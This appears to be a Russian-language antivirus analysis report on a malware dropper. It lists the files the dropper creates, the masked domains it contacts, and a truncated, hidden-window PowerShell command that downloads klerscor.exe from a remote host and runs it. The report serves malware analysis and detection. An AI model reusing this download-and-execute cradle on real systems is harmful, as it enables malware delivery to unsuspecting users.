Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $vonahert как %temp%\klerscor.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{cha...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1097903.cvr
- %TEMP%\owernice38.bat
Сетевая активность
Подключается к
- 'ka###eafoods.gr':80
- 'ka###eafoods.gr':443
- 'st###data.com':80
TCP
Запросы HTTP GET
- http://ka###eafoods.gr/supetre.orau
- http://st###data.com/supetre.orau
- http://www.st###data.com/supetre.orau
Другие
- 'ka###eafoods.gr':443
UDP
- DNS ASK ka###eafoods.gr
- DNS ASK st###data.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{cha...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\owernice38.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\owernice38.bat" "
